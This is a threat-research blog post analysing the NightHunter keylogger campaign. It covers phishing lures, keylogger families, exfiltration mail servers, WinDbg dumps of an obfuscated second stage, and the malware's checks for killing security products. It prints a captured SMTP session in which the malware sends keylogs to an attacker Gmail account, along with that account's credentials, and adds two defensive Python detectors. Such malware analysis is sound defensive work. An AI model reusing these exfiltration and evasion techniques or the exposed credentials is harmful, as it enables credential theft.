NightHunter: Malware data theft campaign has been active since 2009
Cyphort Labs has discovered an extensive data theft campaign that we have named NightHunter. The campaign has been active since 2009 and is designed to steal the login credentials of users.
Posted on July 9, 2014 by McEnroe Navaraj
· The campaign is amassing users' login credentials. At this point it does not seem likely that the actors are targeting specific organizations or industries; we have seen threat activity across several verticals, including energy, education, insurance and even charities.
· Targeted applications include Google, Yahoo, Facebook, Dropbox and Skype.
· The intent of the data collection is unknown, but attackers have many options to leverage the credentials, and the potential for analyzing and correlating the stolen data to mount highly targeted, damaging attacks is high.
· NightHunter uses SMTP (email) for data exfiltration instead of the more common CnC mechanisms that use web protocols. This could simply be a way to "hide (and steal data) in plain sight" as organizations beef up web anomaly detection to deal with advanced attacks.
To learn more about the campaign, join us for our webinar on Thursday, July 31, 2014 at 9:00 AM PDT: http://info.cyphort.com/mmwjuly
It involves several different malware keyloggers, including Predator Pain, Limitless, and Spyrex. The unifying feature is that they all use SMTP (email) for data exfiltration. Email is to social networking what snail mail is to email: outdated and often overlooked, which makes it a stealthier channel for data theft. So we called it NightHunter.
NightHunter is very aggressive at stealing users' passwords and sending them home. The actors behind NightHunter can use the trove of stolen credentials, together with big data analytics, to enable new cyber threats for purposes of extortion, credit card or bank fraud, stealing state secrets or corporate espionage.
Our investigation started with a sample delivered through a phishing email. It is a .NET binary; when executed it steals the user's credentials and sends them to a remote email server. To most existing "advanced" security products this looks like a naive technique. When we looked into the sample, we found additional similar samples. We followed the trail and examined the data they exfiltrated to the remote servers.
The NightHunter data theft campaign is believed to have been active since at least 2009, targeting energy firms, educational institutions, hospitals, charities and other enterprises.
Common Delivery Mechanism:
These samples are delivered mostly through phishing emails carrying DOC/ZIP/RAR attachments. A victim gets infected by opening a malicious document with scripting enabled. Most of the phishing emails target personnel in finance, sales and HR departments; sometimes the actors pose as goods resale agents. We have also seen cases where the malware was bundled with fake IDM/7-Zip installers. Most of these samples used keylogger tools to sniff data from the victim.
Most common phishing email subject/attachment names:
1. WireSlip
2. Jobs List
3. PO
4. Reconfirm Pls
5. Purchase Order
6. Payment Slip
7. Order
8. Inquiry
9. Remittance Payment Slip
Types of Stolen Credentials:
1. Google
2. Facebook
3. Dropbox
4. Yahoo
5. Hotmail
6. Amazon
7. Skype
8. LinkedIn
9. Banks
10. Rediff
Victims Industries:
1. Oil industry
2. Charities
3. Educational Institutes
4. Hospitals
5. Departmental Stores
6. Auditors
7. Export/Import Companies
8. Insurance Companies
9. TV Network
10. Trading Companies
List of keylogger malware used:
1. Limitless logger lite (http://limitlessproducts.org/)
2. Predator Pain
3. Keylogger Logları (SlloTBan)
4. Spyrex
5. FEDERIKO's Logger
6. Unknown Logger Public
7. Aux Logger
8. Neptune
9. Mr. Clyde Logger
10. Ultimate Logger
11. MY Ultimate Jobe
12. Syslogger
13. Syndicate Logger (http://syndicateproducts.org)
We are seeing the Limitless keylogger in many places. Next to Limitless, Predator Pain is popular among the actors. Considering the low cost of the tool, its easy setup, the quality of its virus generator and the features it supports, we are seeing increasing interest from the actors. Though Limitless Logger has been shut down, it was used heavily.
Most of the keyloggers used provide the following features:
– E-Mail/PHP/FTP upload
– Obfuscation
– Spoof Extension and Change Icon
– Clear Browser Data
– Fake Error Message
– Capture Screenshot
– Disable many programs
– Various spreading mechanisms
– File Downloader
– Block various websites
– Self-delete
Data Stealing:
– Bitcoin Stealing
– Password managers
– Firefox/Google Chrome/IE/Safari/Opera
– Outlook
– Pidgin/Trillian/Paltalk/AIM/IMVU
– Various Games and Game Bots
– Filezilla/Flashfxp/CoreFTP/SmartFTP/FTP Commander
One of the samples (f997f9bdf00d82a42cb0985c803a0ba1ba0c7faf0b69b0d4a1888f6d1f46d210), even printed out the activity details to the console.
List of email servers and the number of samples using each:
| Email Server | Sample Count | First Seen | Last Seen |
| --- | --- | --- | --- |
| smtp.googlemail.com/smtp.gmail.com | 2,500 | 2009 | Today |
| smtp.mail.ru | 228 | 2010-10-08 | 2014-06-13 |
| smtp.live.com | 151 | 2010-08-24 | 2014-06-12 |
| mx1.3owl.com | 82 | 2012-09-10 | 2014-06-05 |
| smtp.mail.com | 42 | 2011-04-20 | 2014-06-12 |
| smtp.yandex.com/smtp.yandex.ru | 39 | 2010-12-20 | 2014-06-12 |
| smtp.turkceventrilo.com | 38 | 2014-04-02 | 2014-06-04 |
| smtp.mail.yahoo.com | 25 | 2013-02-15 | 2014-06-13 |
| mail.drmike.com.de | 31 | 2014-04-06 | 2014-05-29 |
| smtp.aol.com | 13 | 2010-10-27 | 2014-06-06 |
| smtp.comcast.net | 18 | 2013-05-31 | 2014-06-12 |
| smtp-mail.outlook.com | 1 | 2014-05-23 | |
| smtp.list.ru | 1 | 2014-06-09 | |
| smtp.hanco-ltd.biz | 10 | 2014-04-04 | 2014-06-10 |
| mail.ieindia.org | 7 | 2014-04-29 | 2014-06-10 |
| mail.npcuae.com | 1 | 2014-06-08 | |
| smtp.bilatraders.com | 1 | 2014-06-04 | |
| mail.persian-trading.com | 5 | 2014-05-25 | 2014-06-06 |
| smtp.poczta.onet.pl | 2 | 2012-06-02 | 2014-06-09 |
| relay.skynet.be | 1 | 2014-06-04 | |
| Smtp.interia.pl | 1 | 2014-06-06 | |
| mx.freenet.de | 1 | 2014-06-05 | |
| cloud73.dotcanada.com | 2 | 2014-04-29 | 2014-05-30 |
| smtp.bk.ru | 5 | 2014-04-21 | 2014-05-26 |
| master.torguard.tg | 3 | 2014-05-16 | 2014-05-23 |
| poczta.o2.pl | 4 | 2014-03-21 | 2014-05-31 |
| smtp.web.de | 2 | 2011-07-03 | 2014-04-11 |
| mail.snookiezinc.com.de | 1 | 2014-03-18 | |
| mail.atbinco.com | 2 | 2014-05-09 | |
| smtps.bol.com.br | 2 | 2014-04-15 | 2014-05-26 |
| mail.glintcosmetics.com | 2 | 2014-04-25 | 2014-06-11 |
Gmail seems to be the most popular email server used by the criminals to "park" victim data in recent times. The larger number of samples using Gmail is likely due to Gmail's popularity and to the fact that most security products "whitelist" Google/Gmail traffic in some way, making it easy to hide this email in the volume of mail sent to Gmail. Another possible reason is that Gmail imposes many restrictions, such as how many emails an account can send per day, which requires the actors to keep sending new malware with new accounts.
The number of samples the actors built for the other email servers is very low. We believe some of the servers were hacked to create an email account; in some cases the actors created their own email server. For example, the email server of The Institution of Engineers (ieindia.org) was hacked to create two accounts, which were used to park victim data mostly from India. Some of the samples that used private email servers were active for only a few weeks.
Most of the virus generator tools provide various options to exfiltrate data from the victim machine, such as email, FTP and PHP upload. Looking at the patterns, most of these actors started with PHP upload and then moved to email. Analysis of recent malware samples reveals that most of the actors now use only email. Very few malware samples used multiple methods, such as FTP and email, to exfiltrate the data.
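One check a defender can run over flow logs for the channel described above, as an added example (not code from the post): workstations submitting mail on SMTP ports directly to anything other than the sanctioned corporate relay, with each destination classified against the public webmail servers from the table above. The flow records, the relay name mail.corp.example and the port set are constructed assumptions.

```python
from collections import defaultdict

# Submission ports; TCP/587 and TCP/2525 are the ones observed in the NightHunter samples.
SMTP_PORTS = {25, 465, 587, 2525}

# Public webmail submission hosts from the server table above; traffic to these is what
# "hides in plain sight" when security products whitelist webmail providers.
WEBMAIL = {"smtp.gmail.com", "smtp.googlemail.com", "smtp.mail.ru", "smtp.live.com",
           "smtp.yandex.com", "smtp.yandex.ru", "smtp.mail.yahoo.com", "smtp.aol.com"}

# Assumed: the only hosts workstations should ever hand mail to.
CORPORATE_RELAYS = {"mail.corp.example"}

# Constructed flow records (src_ip, dst_host, dst_port, bytes_out); not real traffic.
SAMPLE_FLOWS = [
    ("10.1.20.15", "mail.corp.example", 587, 18400),   # normal client submission
    ("10.1.20.15", "www.example.org", 443, 9200),      # unrelated HTTPS
    ("10.1.20.33", "smtp.gmail.com", 587, 3100),       # direct to webmail, twice
    ("10.1.20.33", "smtp.gmail.com", 587, 2950),
    ("10.1.20.41", "mx1.3owl.com", 2525, 4400),        # non-standard submission port
    ("10.1.20.52", "smtp.googlemail.com", 465, 1200),
    ("10.1.30.9", "mail.corp.example", 25, 500),
]


def find_direct_smtp(flows, relays=CORPORATE_RELAYS, ports=SMTP_PORTS):
    """Return {src_ip: [(dst_host, port, category, connections, bytes_out), ...]}
    for every source that submitted mail to something other than a sanctioned relay."""
    hits = defaultdict(lambda: defaultdict(lambda: [0, 0]))
    for src, dst, port, nbytes in flows:
        if port in ports and dst not in relays:
            agg = hits[src][(dst, port)]
            agg[0] += 1        # connection count
            agg[1] += nbytes   # bytes leaving the host on this channel
    return {
        src: sorted((dst, port, "webmail" if dst in WEBMAIL else "other", n, total)
                    for (dst, port), (n, total) in dsts.items())
        for src, dsts in hits.items()
    }


if __name__ == "__main__":
    for src, dests in sorted(find_direct_smtp(SAMPLE_FLOWS).items()):
        for dst, port, category, n, total in dests:
            print(f"{src} -> {dst}:{port} ({category}) {n} conn, {total} bytes")
```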
mx1.3owl.com:
| First Seen Date | Infection Count | Keylogger |
| --- | --- | --- |
| 6/5/2014 | 2 | Predator Pain |
| 6/4/2014 | 31 | Predator Pain |
| 6/4/2014 | 47 | Predator Pain |
| 6/3/2014 | 10 | Predator Pain |
| 6/3/2014 | 15 | Predator Pain |
| 6/3/2014 | 33 | Predator Pain |
| 6/2/2014 | 2 | Predator Pain |
| 6/2/2014 | 50 | Predator Pain |
| 6/2/2014 | 2 | Predator Pain |
| 6/1/2014 | 33 | Predator Pain |
| 5/30/2014 | 7 | Predator Pain |
| 5/25/2014 | 44 | Predator Pain |
| 5/20/2014 | 6 | Predator Pain |
| 5/17/2014 | 5 | Mr. Clyde Logger and Predator |
| 5/15/2014 | 26 | |
| 5/12/2014 | 5 | Mr. Clyde Logger and Predator |
| 5/11/2014 | 39 | Predator Pain |
| 5/8/2014 | 59 | Predator Pain |
| 5/7/2014 | | |
| 5/6/2014 | 6 | Predator Pain |
| 5/2/2014 | 20 | Predator Pain, Limitless Logger |
| 4/24/2014 | 37 | Predator Pain |
| 4/23/2014 | 57 | Predator Pain, Limitless Logger |
| 4/22/2014 | 57 | Predator Pain, Limitless Logger, MY Ultimate Jobe |
| 4/17/2014 | 14 | Predator Pain |
| 4/16/2014 | | |
| 4/15/2014 | 1 | Predator Pain |
| 4/10/2014 | 73 | Predator Pain, Limitless Logger |
| 4/9/2014 | 73 | Limitless Logger |
| 4/5/2014 | 57 | Predator Pain, Limitless Logger |
| 4/3/2014 | 42 | |
| 3/27/2014 | 73 | |
| 2/18/2014 | 1 | Predator Pain |
| 1/28/2014 | 57 | Predator Pain, Limitless Logger, MY Ultimate Jobe |
The actors behind these malware samples (35 out of 82) followed similar techniques when registering domains. The author's identity is hidden from the analyst.
List of samples we looked into that are related to mx1.3owl.com:
mail.ieindia.org:
All the samples related to this email server were active for only a few weeks. They targeted people from India. The actors used Limitless logger to extract information from the victims. Analysts believe that the actors hacked into the organization's email server and created two email accounts to park their data. Victims were from different industries.
Manual Analysis
Most of the samples we manually analyzed included a lot of obfuscation techniques meant to delay analysis. We will look at the static analysis details of this sample (MD5: cfb72c025bc99733a7f0c21242738a57) and other related samples.
Anti-analysis techniques used:
1. Use of non-printable characters as class/variable names in the code.
2. Use of the Assembly.Load() function to load a different assembly.
3. Strings in the code are encoded using various methods. (We found almost 10 different methods.)
4. Security product detection code.
5. Debugger detection code.
We looked into the binary using various .NET disassemblers. Most of them did not work for most of the binaries; we analyzed this binary using ILSpy. Internally it decoded another assembly from its resource section and loaded it.
We decided to dump the second stage using WinDbg. Most of the first-stage binaries did not use debugger detection or security product detection code, but the second stage does.
0:000> sxe ld:mscorlib
0:000> sxe ld:mscorjit
0:000> g
0:000> .loadby sos mscorwks
0:000> !bpmd mscorlib.dll System.AppDomain.Load
0:000> g
0:000> !clrstack -a
OS Thread Id: 0xc64 (0)
ESP EIP
0045ed38 67f0736c System.AppDomain.Load(Byte[])
PARAMETERS:
this = 0x02851268
rawAssembly = 0x02879c04
LOCALS:
<no data>
0045ed3c 00341c55 jhgfdertyui.iuytrdfghj.Form1_Load(System.Object, System.EventArgs)
PARAMETERS:
this = <no data>
sender = <no data>
e = <no data>
LOCALS:
<no data>
0x0045ed3c = 0x02879c04
0:000> !da 0x02879c04
Name: System.Byte[]
MethodTable: 67ac37b8
EEClass: 6787eb8c
Size: 32268(0x7e0c) bytes
Array: Rank 1, Number of elements 32256, Type Byte
Element Methodtable: 67ac3868
[0] 02879c0c
…
[32255] 02881a0b
0:000> .writemem c:\tmp\secondstage.bin 02879c0c L0n32255
Writing 7dff bytes…………….
The second stage binary was again obfuscated. It used a lot of variables with non-printable characters. Since we were not able to set breakpoints in WinDbg, we decided to do dynamic analysis on the binary. This binary tried to persist on the system by modifying the autorun registry key. It first tried to connect to a remote server (which one depends on the binary) to find the external IP address, and then sent an email to the remote server.
It connected to a remote email server (mx1.3owl.com) and sent an email with the victim information. It used the Predator Pain v14 keylogger. We extracted the email credentials from the network traffic.
Let's look at other similar binaries that included credentials in plain text in the original sample itself.
MD5: 3d7fee36dcd7f1e6bed77d6d9648ada5d899d3efc8dc1d1fd605f75c065cf84d
The email credentials were hidden at the end of the file.
Some binaries looked for a few security products installed on the machine. If they found any, they hid their own window and killed the security product.
All of these checks look for a particular process name:
AntiKeyscrambler() -> keyscrambler
AntiWireshark() -> wireshark
AntiAnubis() -> anubis
AntiMalwarebytes() -> mbam
AntiKaspersky() -> avp
AntiOllydbg() -> ollydbg
AntiOutpost() -> outpost
AntiNorman() -> npfmsg
AntiBitDefender() -> bdagent
AntiNOD32() -> egui
We used WinDbg to dump the credentials from some of the samples that did not do debugger detection.
0:000> sxe ld:mscorlib
0:000> sxe ld:mscorjit
0:000> sxe ld:System.Windows.Forms.dll
0:000> g
ModLoad: 00000000`6f680000 00000000`6fb4e000 System.Windows.Forms.dll
ntdll!ZwMapViewOfSection+0xa:
00000000`77a6153a c3 ret
0:000> .loadby sos mscorwks
0:000> .symfix
0:000> ld system_ni
0:000> !bpmd System.dll System.Net.NetworkCredential..ctor
0:000> !bpmd System.dll System.Net.NetworkCredential..ctor
Found 4 methods…
Setting breakpoint: bp 000007FEEA84F490 [System.Net.NetworkCredential..ctor()]
Setting breakpoint: bp 000007FEEA3D6B10 [System.Net.NetworkCredential..ctor(System.String, System.String)]
Setting breakpoint: bp 000007FEEA84F4A0 [System.Net.NetworkCredential..ctor(System.String, System.String, System.String)]
Setting breakpoint: bp 000007FEEA84F4C0 [System.Net.NetworkCredential..ctor(System.String, System.String, System.String, Boolean)]
0:000> g
Breakpoint 1 hit
System_ni+0x236b10:
000007fe`ea3d6b10 53 push rbx
0:000> !dumpobj -nofields rdx
Name: System.String
MethodTable: 000007feeb007d90
EEClass: 000007feeac0e560
Size: 66(0x42) bytes
(C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll)
String: alinsterpu@gmail.com
0:000> !dumpobj -nofields r8
Name: System.String
MethodTable: 000007feeb007d90
EEClass: 000007feeac0e560
Size: 46(0x2e) bytes
(C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll)
String: hainerosii
Most of the binaries used TCP/587 to send emails to the remote server. Some binaries associated with mx1.3owl.com used TCP/2525. We retrieved most of the credentials using dynamic analysis, including those for Gmail. Gmail uses an encrypted channel to communicate with the remote server, and since the number of samples that used Gmail was high, we decided to MITM the Gmail traffic in our malware lab.
S->C 53 b'220 mx.google.com ESMTP ec2sm20231912pbc.63 - gsmtp\r\n'
C->S 16 b'EHLO test-PC\r\n'
S->C 137 b'250-mx.google.com at your service, [67.188.0.147]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-STARTTLS\r\n250-ENHANCEDSTATUSCODES\r\n250 CHUNKING\r\n'
C->S 10 b'STARTTLS\r\n'
S->C 30 b'220 2.0.0 Ready to start TLS\r\n'
Wrapping sockets.
C->S 16 b'EHLO test-PC\r\n'
S->C 178 b'250-mx.google.com at your service, [67.188.0.147]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-AUTH LOGIN PLAIN XOAUTH XOAUTH2 PLAIN-CLIENTTOKEN\r\n250-ENHANCEDSTATUSCODES\r\n250 CHUNKING\r\n'
C->S 41 b'AUTH login YWxpbnN0ZXJwdUBnbWFpbC5jb20=\r\n'
S->C 18 b'334 UGFzc3dvcmQ6\r\n'
C->S 18 b'aGFpbmVyb3NpaQ==\r\n'
S->C 20 b'235 2.7.0 Accepted\r\n'
C->S 34 b'MAIL FROM:<alinsterpu@gmail.com>\r\n'
S->C 42 b'250 2.1.0 OK ec2sm20231912pbc.63 - gsmtp\r\n'
C->S 32 b'RCPT TO:<alinsterpu@gmail.com>\r\n'
S->C 42 b'250 2.1.5 OK ec2sm20231912pbc.63 - gsmtp\r\n'
C->S 6 b'DATA\r\n'
S->C 43 b'354 Go ahead ec2sm20231912pbc.63 - gsmtp\r\n'
C->S 228 b'MIME-Version: 1.0\r\nFrom: alinsterpu@gmail.com\r\nTo: alinsterpu@gmail.com\r\nDate: 17 Jun 2014 01:25:48 +0530\r\nSubject: New keylogger logs!\r\nContent-Type: text/plain; charset=us-ascii\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\n'
C->S 48 b'keylogger started at: 6/17/2014 1:24:43 AM=0D=0A'
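To pull the parked-mailbox credentials, envelope and headers out of a capture in the C->S/S->C format shown above, here is an added Python parser (not code from the post or from Cyphort). It handles AUTH LOGIN both with an initial response and through the 334 challenges; the embedded transcript is constructed, with the placeholder mailbox logs@example.net and password s3cret in place of the real values.

```python
import ast
import base64
import re

# One transcript line: direction, byte count, then a Python bytes literal
LINE_RE = re.compile(r"^(C->S|S->C)\s+\d+\s+(b'.*')$", re.M)

# Constructed transcript in the capture format shown above. The mailbox
# logs@example.net and password s3cret are placeholders, not values from the post.
SAMPLE_TRANSCRIPT = r"""
C->S 14 b'EHLO test-PC\r\n'
C->S 10 b'STARTTLS\r\n'
S->C 30 b'220 2.0.0 Ready to start TLS\r\n'
C->S 37 b'AUTH login bG9nc0BleGFtcGxlLm5ldA==\r\n'
S->C 18 b'334 UGFzc3dvcmQ6\r\n'
C->S 10 b'czNjcmV0\r\n'
S->C 20 b'235 2.7.0 Accepted\r\n'
C->S 30 b'MAIL FROM:<logs@example.net>\r\n'
C->S 28 b'RCPT TO:<logs@example.net>\r\n'
C->S 6 b'DATA\r\n'
C->S 78 b'From: logs@example.net\r\nTo: logs@example.net\r\nSubject: New keylogger logs!\r\n\r\n'
C->S 48 b'keylogger started at: 6/17/2014 1:24:43 AM=0D=0A'
"""


def parse_transcript(text):
    """Return the mailbox credentials, envelope and headers the malware disclosed."""
    result = {"starttls": False, "username": None, "password": None,
              "mail_from": None, "rcpt_to": None, "headers": {}}
    challenge, in_data, data = False, False, b""
    for m in LINE_RE.finditer(text):
        direction, payload = m.group(1), ast.literal_eval(m.group(2))
        if direction == "S->C":
            challenge = payload.startswith(b"334")  # next client line answers it
            continue
        if in_data:
            data += payload  # everything after DATA is the message itself
            continue
        for cmd in filter(None, payload.split(b"\r\n")):
            verb, _, arg = cmd.partition(b" ")
            verb = verb.upper()
            if challenge:
                # AUTH LOGIN challenges ask for the username first, then the password
                key = "username" if result["username"] is None else "password"
                result[key] = base64.b64decode(cmd).decode()
                challenge = False
            elif verb == b"STARTTLS":
                result["starttls"] = True
            elif verb == b"AUTH" and arg.upper().startswith(b"LOGIN "):
                # Initial-response form: AUTH LOGIN <base64 username>
                result["username"] = base64.b64decode(arg.split()[1]).decode()
            elif verb in (b"MAIL", b"RCPT"):
                addr = arg.split(b"<", 1)[1].split(b">", 1)[0].decode()
                result["mail_from" if verb == b"MAIL" else "rcpt_to"] = addr
            elif verb == b"DATA":
                in_data = True
    # Headers end at the first blank line of the DATA section
    for line in data.split(b"\r\n\r\n", 1)[0].split(b"\r\n"):
        name, sep, value = line.partition(b":")
        if sep:
            result["headers"][name.decode().lower()] = value.strip().decode()
    return result
```

Because the transcript is taken after the MITM proxy has unwrapped TLS, the AUTH exchange is visible here even though it was encrypted on the wire; the same parser applies to a plaintext TCP/587 or TCP/2525 session captured directly.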
One of the samples we analyzed (MD5: 8962ca1997193be3931c41983cc4600e941d40bdb0fdddafa00f3761feeb4ba8) used both email and FTP to exfiltrate data from the user's machine.
Most of the samples used code-level obfuscation to delay analysis. In the end we found 10 different methods (decoding/decryption) used to decode the various strings, which is no surprise given that these samples were created with similar virus generator tools.
NightHunter is one of the more unusual campaigns we have researched at Cyphort because of its footprint and the complex data collection models it exhibits; furthermore, its use of low-signal evasion such as webmail for data exfiltration points to a much larger end goal. This reflects the shifting tradecraft being adopted by actors who leverage big data models to mine more interesting and strategically useful data, whether for direct and targeted attacks or to provide highly actionable content to other actors for economic benefit.